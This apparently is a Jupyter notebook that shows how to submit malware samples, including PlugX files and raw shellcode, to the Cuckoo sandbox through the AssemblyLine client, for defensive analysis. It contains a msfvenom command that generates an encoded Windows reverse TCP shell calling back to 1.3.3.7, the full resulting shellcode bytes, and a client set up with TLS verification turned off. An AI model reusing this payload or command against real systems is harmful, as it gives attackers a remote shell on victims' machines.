This notebook is intended to demonstrate how to leverage some of the more advanced Cuckoo Sandbox features using the AssemblyLine Cuckoo Service.

In [ ]:
import assemblyline_client
import getpass

In [ ]:
# Replace the server, username and password
c = assemblyline_client.Client(raw_input("AL server"), auth=(raw_input("AL username"), getpass.getpass("AL Password")), verify=False)

# Submit a EXE along with DLL

Or any kind of submission that needs additional support files (encrypted blobs, etc)

For example, [this blog post](https://community.rsa.com/thread/185439) details a PlugX sample that maintains persistence using 3 files:

* rc.exe - SHA256: 83be17ad26522c9e0e6b28c8638c6548908baeb1e945db77b747ff85e74fea3c
* rcdll.dll - SHA256: 773a32d2c553b069ec7c49fe5285084de8da72924f4da2a1f789ae4dd8ef6717
* rc.hlp - SHA256: 6be2f82275c5062d88698ad3a3dd15bb15bec4c416a49b84626bed0910e877a7

(This example is somewhat contrived since the original PDF executes fine in Cuckoo, and drops and executes those three files)

If you get those three files and place them into a zip file, you can submit it to AssemblyLine to be examined by the Cuckoo service as shown in code below. 

We're just making use of [built in Cuckoo features](https://github.com/cuckoosandbox/cuckoo/blob/master/cuckoo/data/analyzer/windows/modules/packages/zip.py) to specify a file within a zip to execute.

**NB**

* The same options can be provided via the `al-submit` command line script as well.
* If the Extract AssemblyLine service is also selected, the zip file **will not** make it to Cuckoo. Extract will unzip and submit the files individually.

In [ ]:
c.submit("/path/to/file.zip",
        params = {
            "selected": ["Cuckoo"]
        },
        srv_spec = {
            "Cuckoo": {
                "custom_options": "file=rc.exe"
            }
        })

# Submit shellcode

AssemblyLine doesn't do a great job at recognizing when a blob of binary data is "shellcode". We can effectively tell Cuckoo it is by appending a ".bin" suffix to the file on submission.

We need to generate some shellcode to work with, you can use metasploit via [this](https://hub.docker.com/r/remnux/metasploit/) docker image:

```
# as root
docker pull remnux/metasploit
docker run --rm -it -v ~/.msf4:/root/.msf4 -v /tmp/msf:/tmp/data remnux/metasploit

# You should have a shell inside the docker container at this point
# Generate a shellcode that will try and call back to IP 1.3.3.7
msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python LHOST=1.3.3.7

```

In [ ]:
buf =  ""
buf += "\xd9\xe8\xbd\xdd\xdc\x77\xb4\xd9\x74\x24\xf4\x5b\x31"
buf += "\xc9\xb1\x61\x31\x6b\x1a\x83\xc3\x04\x03\x6b\x16\xe2"
buf += "\x28\x67\x7d\xc4\x89\x99\x5b\xe4\xf4\xee\x7f\x11\x5c"
buf += "\x24\x49\x68\x3b\x0b\x13\x99\x38\xa9\xa7\x9e\x6e\x50"
buf += "\x11\x54\x30\x13\xe1\x2f\xbe\xdb\x0a\xd2\x40\x38\x30"
buf += "\xa8\xe9\xd5\x74\x1d\x89\x98\xd5\x2f\x98\x48\xe8\x8a"
buf += "\x46\x33\x27\xb9\xe1\xa4\xf6\x85\xe3\x7c\xa1\xb3\x73"
buf += "\x16\x95\x8c\xc1\x0d\x85\xee\x91\x37\xf1\xcd\x1c\x31"
buf += "\xab\xf4\x7d\x01\xca\x9b\xed\x4c\xd8\x5a\xf4\x29\x27"
buf += "\x8e\x89\x87\x97\x78\x29\x72\xa3\x8f\xdf\x33\x2a\x89"
buf += "\x28\xa7\xad\x25\x60\xa7\x4b\xcc\x35\x55\x9a\x15\xe6"
buf += "\x9a\x36\x47\xf4\x79\x81\xae\xaa\x59\x64\x0b\xfa\xbd"
buf += "\xf0\x13\x59\xe5\x29\x28\xae\x02\xa1\x28\x2d\x5e\x18"
buf += "\x0b\xf1\xc8\x25\xbc\x0b\xae\x7f\x92\x97\xf0\xee\xc8"
buf += "\xd0\xd2\x0f\xa9\x72\xc1\xe9\xee\x27\x06\xc2\xb2\xdd"
buf += "\xa8\xb5\x40\xe7\x6d\xc5\x7f\xa6\xa4\x9f\x11\x38\xe8"
buf += "\x9c\xdb\x0c\x93\xb3\xf6\x56\x1e\xa0\x59\x86\x96\xe4"
buf += "\x6d\xc8\x0a\x0c\xa0\x12\x54\xe5\x3e\x4c\xb3\x26\xb2"
buf += "\x81\x94\x16\xd2\x4a\x8a\x4e\x1e\x43\x47\xc7\x44\x01"
buf += "\x87\xce\x48\x2b\x0e\x38\x27\x21\xdb\xae\xeb\x64\x4a"
buf += "\xfc\x65\xf1\x44\x5f\x16\x3e\x17\xdd\xdb\xff\x51\xe1"
buf += "\xa7\xfc\xf9\xd6\xdd\xa5\x5b\x51\x08\x88\xd2\x40\x29"
buf += "\xe9\x03\x9f\x34\xd9\x60\xcf\x48\xe4\xe3\x7d\xc7\x7e"
buf += "\x06\x87\xb4\xd1\x1f\x05\xc9\xa7\x57\xe2\x13\xe2\x4c"
buf += "\x20\x75\x12\xfa\xdb\x3a\x3e\xa0\xdc\x9c\x20\x43\xf6"
buf += "\x54\xbe\x42\x8c\xd0\xa4\x61\x86\x91\x94\xd9\xce\x07"
buf += "\xda\x23\xac\x83\x0d\x39\x64\xd1\xd9\x98\x87\xc6\x0f"
buf += "\xc3\xaa\x80\x5f\xb1\xb5\x76\x56\xd8\x67\x6e\x42\x30"
buf += "\x12\x54\xc5\x17\x54\xd6\x15\x9a\x02\x37\x53\x94\xbb"
buf += "\x2c\x32\xc2\xb1\xce\x60\xa2\xf9\x7d\x76\x07\xf2\x3b"
buf += "\xf6\x3c\x98\x75\x6b\xfe\x22\x42\x20\x9d\xc6\x66\xfa"
buf += "\x9a\x05\x54\x82\x61\x29\x7d\xaa\x0b\xc8\x3c"

with open("msf_shellcode.bin","wb") as fh:
    fh.write(buf)

In [ ]:
c.submit("msf_shellcode.bin",
        params = {
            "selected": ["Cuckoo"]
        },
        srv_spec = {
            "Cuckoo": {
                # Optional, reduce the normal timeout. Useful for testing
                "analysis_timeout": 20
            }
        })